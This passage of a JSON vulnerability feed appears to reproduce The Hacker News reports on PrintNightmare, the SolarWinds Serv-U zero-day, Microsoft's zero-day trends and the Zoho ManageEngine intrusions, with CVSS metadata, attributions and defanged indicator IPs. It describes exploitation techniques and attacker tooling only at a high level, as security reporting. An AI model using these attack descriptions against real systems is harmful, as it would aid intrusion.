"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[![windows print spooler vulnerability](https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s728-e1000/windows-print-spooler-vulnerability.jpg)](<https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s0/windows-print-spooler-vulnerability.jpg>)\n\nMicrosoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with a fully working PoC code, before it was taken down just hours after it went up.\n\n[![](https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg)](<https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg>)\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 for reasons that the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending users to disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface and as an alternative to completely disabling printing, the company is also advising to check membership and nested group membership, and reduce membership as much as possible, or completely empty the groups where possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-06T10:35:28", "description": "[![SolarWinds](https://thehackernews.com/images/-jSefSyaoEXg/YTMlSOpTaDI/AAAAAAAADuc/6tVl9cVHQocqXEvrp-hkyi73_VGjF59hgCLcBGAsYHQ/s728-e1000/SolarWinds.jpg)](<https://thehackernews.com/images/-jSefSyaoEXg/YTMlSOpTaDI/AAAAAAAADuc/6tVl9cVHQocqXEvrp-hkyi73_VGjF59hgCLcBGAsYHQ/s0/SolarWinds.jpg>)\n\nMicrosoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with \"high confidence\" to a threat actor operating out of China.\n\nIn mid-July, the Texas-based company [remedied](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>) a remote code execution flaw ([CVE-2021-35211](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>)) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\n\"The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration,\" Microsoft Offensive Research and Security Engineering team said in a [detailed write-up](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) describing the exploit.\n\n\"An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported,\" the researchers added.\n\nWhile Microsoft [linked](<https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html>) the attacks to DEV-0322, a China-based collective citing \"observed victimology, tactics, and procedures,\" the company has now revealed that the remote, pre-auth vulnerability stemmed from the manner the Serv-U process handled access violations without terminating the process, thereby making it simple to pull off stealthy, reliable exploitation attempts.\n\n[![](https://thehackernews.com/images/-mBVijrliiYs/YTMhBkqFg5I/AAAAAAAADuU/acCyK_NFBd0EK9Q7CZeW9acGcEZnZe-TQCLcBGAsYHQ/s0/code.jpg)](<https://thehackernews.com/images/-mBVijrliiYs/YTMhBkqFg5I/AAAAAAAADuU/acCyK_NFBd0EK9Q7CZeW9acGcEZnZe-TQCLcBGAsYHQ/s0/code.jpg>)\n\n\"The exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context,\" the researchers said. \"This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages.\"\n\n\"Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation,\" the researchers added.\n\nASLR refers to a [protection mechanism](<https://www.fireeye.com/blog/threat-research/2020/03/six-facts-about-address-space-layout-randomization-on-windows.html>) that's used to increase the difficulty of performing a buffer overflow attack by randomly arranging the address space positions where system executables are loaded into memory.\n\nMicrosoft, which reported the vulnerability to SolarWinds, said it recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. \"ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U,\" the researchers said.\n\nIf anything, the revelations highlight the variety of techniques and tools used by threat actors to breach corporate networks, including piggybacking on legitimate software.\n\nAlthough the SolarWinds supply chain attacks have been formally pinned on Russian APT29 hackers, Microsoft in December 2020 disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. Cybersecurity firm Secureworks connected the intrusions to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-04T07:50:00", "type": "thn", "title": "Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-06T10:12:29", "id": "THN:D84F06239D4B68B06712C485E00D6D1F", "href": "https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![SolarWinds vulnerability](https://thehackernews.com/images/-xrVxmLD2g1c/YO0JK_DtgnI/AAAAAAAADKE/A8jsKUV1VfoaSivULzYY8fgaTL1LXIzaACLcBGAsYHQ/s728-e1000/solarwinds.jpg)](<https://thehackernews.com/images/-xrVxmLD2g1c/YO0JK_DtgnI/AAAAAAAADKE/A8jsKUV1VfoaSivULzYY8fgaTL1LXIzaACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nSolarWinds, the Texas-based company that became the epicenter of a [massive supply chain attack](<https://thehackernews.com/2021/04/researchers-find-additional.html>) late last year, has issued patches to contain a remote code execution flaw in its Serv-U managed file transfer service.\n\nThe fixes, which target Serv-U Managed File Transfer and Serv-U Secure FTP products, arrive after Microsoft notified the IT management and remote monitoring software maker that the flaw was being exploited in the wild. The threat actor behind the exploitation remains unknown as yet, and it isn't clear exactly how the attack was carried out.\n\n\"Microsoft has provided evidence of limited, targeted customer impact, though SolarWinds does not currently have an estimate of how many customers may be directly affected by the vulnerability,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in an advisory published Friday, adding it's \"unaware of the identity of the potentially affected customers.\"\n\nImpacting Serv-U versions 15.2.3 HF1 and before, a successful exploitation of the shortcoming ([CVE-2021-35211](<https://nvd.nist.gov/vuln/detail/CVE-2021-35211>)) could enable an adversary to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\nAs indicators of compromise, the company is urging administrators to watch out for potentially suspicious connections via SSH from the IP addresses 98[.]176.196.89 and 68[.]235.178.32, or via TCP 443 from the IP address 208[.]113.35.58. Disabling SSH access on the Serv-U installation also prevents compromise.\n\nThe issue has been addressed in [Serv-U version 15.2.3 hotfix (HF) 2](<https://customerportal.solarwinds.com/>).\n\nSolarWinds also stressed in its advisory that the vulnerability is \"completely unrelated to the SUNBURST supply chain attack\" and that it does not affect other products, notably the Orion Platform, which was exploited to drop malware and dig deeper into the targeted networks by suspected Russian hackers to spy on multiple federal agencies and businesses in one of the most serious security breaches in U.S. history.\n\nA string of [software supply chain attacks](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) since then has highlighted the fragility of modern networks and the sophistication of threat actors to identify hard-to-find vulnerabilities in widely-used software to conduct espionage and drop ransomware, in which hackers shut down the systems of business and demand payment to allow them to regain control.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T03:58:00", "type": "thn", "title": "A New Critical SolarWinds Zero-Day Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T03:18:35", "id": "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "href": "https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-14T04:09:19", "description": "[![0-Day Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjTxKfxj2a6lMbDbJaMo5tht_LOymmcrKcCWFtR24mQo74TUahCanF09uTukayi4zQWtyXbBN6gL1r8Q_F8hPVGvbFPUvpNfu0RMdh_in3x47i7NaY_2APPaDC8WmxtnyovksaoophnnKee-_hL8d3KTmywDQksxEixb5Qu7Hqf3_NL3lzttzW4eVJp/s728-e100/ms.jpg>)\n\nMicrosoft is warning of an uptick among nation-state and criminal actors increasingly leveraging publicly-disclosed zero-day vulnerabilities for breaching target environments.\n\nThe tech giant, in its 114-page [Digital Defense Report](<https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report-2022>), said it has \"observed a reduction in the time between the announcement of a vulnerability and the commoditization of that vulnerability,\" making it imperative that organizations patch such exploits in a timely manner.\n\nThis also corroborates with an April 2022 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which [found](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that bad actors are \"aggressively\" targeting newly disclosed software bugs against broad targets globally.\n\nMicrosoft noted that it only takes 14 days on average for an exploit to be available in the wild after public disclosure of a flaw, stating that while zero-day attacks are initially limited in scope, they tend to be swiftly adopted by other threat actors, leading to indiscriminate probing events before the patches are installed.\n\nIt further accused Chinese state-sponsored groups of being \"particularly proficient\" at discovering and developing zero-day exploits.\n\n[![0-Day Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj2Fv84B8E1NDduixEzAgNyU-RvvdpVt2eY23UON-dCns8KnaaAn-rqjv_Tihoscf0lzJzcswmhacAZgW8Jdh82sqVfWIDHVa5zBDWPlh_uT7dLVU8BmoLqbWxqL-deV3Ok2yZ8h76dqXIbZ3SIOJJND7p6ixLGZmV_q9RpnvhYkQ9ABNMKZOdjtetP/s728-e100/exploit.jpg>)\n\nThis has been compounded by the fact that the Cyberspace Administration of China (CAC) enacted a new [vulnerability reporting regulation](<https://thehackernews.com/2021/07/chinas-new-law-requires-researchers-to.html>) in September 2021 that requires security flaws to be reported to the government prior to them being shared with the product developers.\n\nRedmond further said the law could enable government-backed elements to stockpile and weaponize the reported bugs, resulting in the increased use of zero-days for espionage activities designed to advance China's economic and military interests.\n\n[![state-sponsored hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjzThAws7Nwe2onkDTrV1eAUZuHoxUQmHQD89fb1AMyF95hzxM_bjDK2t9-CUBtPHmaWAaGh6oLRZRmlWELsneZ9fLS1yThyXWXTF3Vhb67iMNcw8AvGM2hLy535BKjYA6NJ8csrauUfJWp6VGl-g4LRpHIAsWQ1E7ev0MDFndlR4i_R0-xqgivOOTY/s728-e100/map.jpg>)\n\nSome of the vulnerabilities that were first exploited by Chinese actors before being picked up by other adversarial groups include -\n\n * [**CVE-2021-35211**](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>) (CVSS score: 10.0) - A remote code execution flaw in SolarWinds Serv-U Managed File Transfer Server and Serv-U Secure FTP software that was exploited by DEV-0322.\n * [**CVE-2021-40539**](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) (CVSS score: 9.8) - An authentication bypass flaw in Zoho ManageEngine ADSelfService Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-44077**](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) - An unauthenticated remote code execution flaw in Zoho ManageEngine ServiceDesk Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-42321**](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) (CVSS score: 8.8) - A remote code execution flaw in Microsoft Exchange Server that was exploited three days after it was revealed during the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) hacking contest on October 16-17, 2021.\n * [**CVE-2022-26134**](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) (CVSS score: 9.8) - An Object-Graph Navigation Language (OGNL) injection flaw in Atlassian Confluence that's likely to have been leveraged by a China-affiliated actor against an unnamed U.S. entity days before the flaw's disclosure on June 2.\n\nThe findings also come almost a month after CISA released a list of [top vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-279a>) weaponized by China-based actors since 2020 to steal intellectual property and develop access into sensitive networks.\n\n\"Zero-day vulnerabilities are a particularly effective means for initial exploitation and, once publicly exposed, vulnerabilities can be rapidly reused by other nation-state and criminal actors,\" the company said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-05T06:00:00", "type": "thn", "title": "Microsoft Warns of Uptick in Hackers Leveraging Publicly-Disclosed 0-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539", "CVE-2021-42321", "CVE-2021-44077", "CVE-2022-26134"], "modified": "2022-12-14T04:04:34", "id": "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "href": "https://thehackernews.com/2022/11/microsoft-warns-of-uptick-in-hackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![Chinese Hackers](https://thehackernews.com/images/-jV4pKLPO7z0/YO5ckCIQNCI/AAAAAAAADLw/TXffCrpewWobX23OGALAYFYzGr4TeTg5gCLcBGAsYHQ/s728-e1000/china-hackers.jpg)](<https://thehackernews.com/images/-jV4pKLPO7z0/YO5ckCIQNCI/AAAAAAAADLw/TXffCrpewWobX23OGALAYFYzGr4TeTg5gCLcBGAsYHQ/s0/china-hackers.jpg>)\n\nMicrosoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed \"DEV-0322.\"\n\nThe revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads or view and alter sensitive data.\n\nTracked as [CVE-2021-35211](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>), the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. While it was previously revealed that the attacks were limited in scope, SolarWinds said it's \"unaware of the identity of the potentially affected customers.\"\n\nAttributing the intrusions with high confidence to DEV-0322 (short for \"Development Group 0322\") based on observed victimology, tactics, and procedures, Microsoft Threat Intelligence Center (MSTIC) said the adversary is known for targeting entities in the U.S. Defense Industrial Base Sector and software companies.\n\n[![SolarWinds 0-Day](https://thehackernews.com/images/-55EFUGOJ584/YO5Y4JTqstI/AAAAAAAADLo/AkprVUi-G1ETMw4yhMrl4J5x66wUvYMcQCLcBGAsYHQ/s728-e1000/windows-malware.jpg)](<https://thehackernews.com/images/-55EFUGOJ584/YO5Y4JTqstI/AAAAAAAADLo/AkprVUi-G1ETMw4yhMrl4J5x66wUvYMcQCLcBGAsYHQ/s0/windows-malware.jpg>)\n\n\"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,\" [according](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) to MSTIC, which discovered the zero-day after it detected as many as six anomalous malicious processes being spawned from the main Serv-U process, suggesting a compromise.\n\nThe development also marks the second time a China-based hacking group has exploited vulnerabilities in SolarWinds software as a fertile field for targeted attacks against corporate networks.\n\nBack in December 2020, Microsoft disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. The intrusions have since been attributed to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\nAdditional indicators of compromise associated with the attack can be accessed from SolarWinds' revised advisory [here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n**Update:** This article has been updated to reflect that attackers didn't exploit the SolarWinds flaw to target defense and software companies. As of now, no information has been provided on who was attacked during this zero-day attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T03:41:00", "type": "thn", "title": "Chinese Hackers Exploited Latest SolarWinds 0-Day in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T17:24:08", "id": "THN:05251A4D0E47381FEC6EC98D27F46C16", "href": "https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:07", "description": "[![ManageEngine ADSelfService Exploit](https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH>)\n\nAt least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. \"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability relates to an authentication bypass vulnerability affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and 